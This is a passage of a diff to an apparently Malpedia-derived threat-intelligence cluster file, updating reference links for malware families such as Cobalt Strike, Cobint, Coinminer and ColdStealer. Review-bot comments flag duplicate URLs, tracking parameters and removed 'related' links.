+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734",
+ "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
+ "https://twitter.com/GossiTheDog/status/1438500100238577670",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://asec.ahnlab.com/en/31811/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html",
+ "https://cert.gov.ua/article/37704",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
+ "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/",
+ "https://twitter.com/RedDrip7/status/1402640362972147717?s=20",
+ "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
+ "https://isc.sans.edu/diary/28636",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
+ "https://isc.sans.edu/diary/26752",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
+ "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/",
+ "https://malwarelab.eu/posts/fin6-cobalt-strike/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://asec.ahnlab.com/ko/19640/",
+ "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f",
+ "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://twitter.com/cglyer/status/1480742363991580674",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/",
+ "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book",
+ "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://twitter.com/alex_lanstein/status/1399829754887524354",
+ "https://blog.group-ib.com/colunmtk_apt41",
+ "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
+ "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://asec.ahnlab.com/en/34549/",
+ "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blog.group-ib.com/apt41-world-tour-2021",
+ "https://www.youtube.com/watch?v=C733AyPzkoc",
+ "https://blog.group-ib.com/opera1er-apt",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/",
+ "https://malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
+ "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/",
+ "https://www.mandiant.com/media/12596/download",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
+ "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
+ "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://github.com/Apr4h/CobaltStrikeScan",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/",
+ "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
+ "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI",
+ "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
+ "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
+ "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://blog.cobaltstrike.com/",
+ "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
+ "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/",
+ "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654",
+ "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
+ "https://boschko.ca/cobalt-strike-process-injection/",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
+ "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack",
+ "https://www.youtube.com/watch?v=borfuQGrB8g",
+ "https://cert.gov.ua/article/339662",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
+ "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
+ "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
+ "https://redcanary.com/blog/gootloader",
+ "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e"
],
"synonyms": [
"Agentemis",
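Review bot: several of the added Cobalt Strike refs carry tracking or session parameters, or duplicate another entry in the same list, and should be normalised before merge: `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout` on the crowdstrike.com carbon-spider URL, `?s=20` on two of the twitter.com status URLs, and a trailing `#` on the domaintools.com URL. The darkside-affiliate-supply-chain-software-compromise post is listed under both fireeye.com and mandiant.com, and the campo_new_attack_campaign_targeting_japan post under both the mal-eats.net/en/ and root paths, so the same source is counted twice. The secureworks.com gold-kingswood profile is also referenced over plain http while every other secureworks.com ref in this hunk uses https.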
@@ -17644,15 +18761,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "97f26fab-af0e-4da9-b4c1-aec70cace22d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550",
"value": "Cobalt Strike"
},
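Review bot: this hunk drops the `related` block (dest-uuid 97f26fab-af0e-4da9-b4c1-aec70cace22d, type `similar`) from the Cobalt Strike entry with no replacement, and the same removal is applied to the Coinminer, Combos and COMpfun entries further down. If these cross-cluster links are now derived elsewhere, say so in the commit message; if not, the edges to the related clusters are silently lost and consumers that pivot on `related` will no longer resolve them.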
@@ -17661,9 +18769,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat",
- "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
"https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/"
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html"
],
"synonyms": [],
"type": []
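Review bot: the only substantive change in this hunk is the new cocomelonc.github.io ref, but the diff touches four lines because the existing securityaffairs.co and yoroi.company URLs are moved. The same reorder-only churn appears in most hunks below (Cobint, Cobra, Cold$eal, Colony, Comebacker, Computrace). Since these refs are imported from Malpedia, the cluster's declared source, sorting the `refs` array deterministically before writing would keep future diffs limited to real additions and removals.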
@@ -17676,15 +18785,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.group-ib.com/blog/renaissance",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/",
- "https://www.netscout.com/blog/asert/double-infection-double-fun"
+ "https://www.netscout.com/blog/asert/double-infection-double-fun",
+ "https://www.group-ib.com/blog/renaissance",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood"
],
"synonyms": [
"COOLPANTS"
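Review bot: the reordered Cobint refs keep both `https://www.secureworks.com/research/threat-profiles/gold-kingswood` and `http://www.secureworks.com/research/threat-profiles/gold-kingswood` as the last two entries; these point to the same profile and only the https form should remain.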
@@ -17699,21 +18808,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra",
- "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
- "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
- "https://www.circl.lu/pub/tr-25/",
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
"https://github.com/hfiref0x/TDL",
+ "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
+ "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.circl.lu/pub/tr-25/",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
+ "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
],
"synonyms": [
"Carbon"
@@ -17780,26 +18890,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://secrary.com/ReversingMalware/CoinMiner/",
"https://www.triskelelabs.com/investigating-monero-coin-miner",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://secrary.com/ReversingMalware/CoinMiner/"
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "89bd2020-2594-45c4-8957-522c0ac41370",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
"value": "Coinminer"
},
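Review bot: after the reorder the Coinminer refs still list the Malwarebytes heavens-gate post twice, once at its canonical path and once with the `/amp/` suffix; the AMP copy adds nothing and should be dropped. This hunk also removes the entry's `related` block (dest-uuid 89bd2020-2594-45c4-8957-522c0ac41370); see the comment on the Cobalt Strike hunk above.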
@@ -17835,11 +18936,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
"https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
- "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html",
- "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html",
"https://www.youtube.com/watch?v=242Tn0IL2jE",
- "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/"
+ "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html",
+ "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html"
],
"synonyms": [
"ColdSeal"
@@ -17850,12 +18951,13 @@
"value": "Cold$eal"
},
{
- "description": "",
+ "description": "ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. When the infostealer collects information that will be stolen, it saves the information in the ZIP form instead of files in the memory. Doing so will allow the malware to bypass detection as there are no traces of files and execution. The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to the hardcoded command and control (C2) server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer",
"https://asec.ahnlab.com/ko/31703/",
- "https://asec.ahnlab.com/en/32090/"
+ "https://asec.ahnlab.com/en/32090/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/"
],
"synonyms": [],
"type": []
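Review bot: the new ColdStealer description needs a clarity pass before merge: the sentence "it saves the information in the ZIP form instead of files in the memory" does not say where the archive is built, and the following claim that this lets the malware "bypass detection as there are no traces of files and execution" overstates what in-memory staging achieves. Suggest stating plainly that collected data is packed into a ZIP archive in memory rather than written to disk as individual files, which avoids file-system artefacts but not memory or network detection.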
@@ -17868,10 +18970,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri",
+ "https://github.com/Casperinous/colibri_loader",
"https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
"https://fr3d.hk/blog/colibri-loader-back-to-basics",
- "https://github.com/Casperinous/colibri_loader"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign"
],
"synonyms": [],
"type": []
@@ -17884,6 +18988,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
"https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/"
],
"synonyms": [
@@ -17899,8 +19004,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.colony",
- "https://pastebin.com/GtjBXDmz",
"https://twitter.com/anyrun_app/status/976385355384590337",
+ "https://pastebin.com/GtjBXDmz",
"https://secrary.com/ReversingMalware/Colony_Bandios/"
],
"synonyms": [
@@ -17935,15 +19040,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fa38b79c-9774-45a0-831c-24c6c8d39a22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
"value": "Combos"
},
@@ -17953,10 +19049,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker",
"https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/",
+ "https://www.anquanke.com/post/id/230161",
"https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/",
- "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/",
"https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/",
- "https://www.anquanke.com/post/id/230161"
+ "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/"
],
"synonyms": [],
"type": []
@@ -17991,13 +19087,26 @@
"uuid": "7726de54-95cc-4783-b26f-79882f0f6cba",
"value": "ComLook"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic",
+ "https://securelist.com/bad-magic-apt/109087/?s=31"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "600b553b-660b-4bbd-9c5d-4e91af9d276a",
+ "value": "CommonMagic"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec",
- "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf"
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
],
"synonyms": [],
"type": []
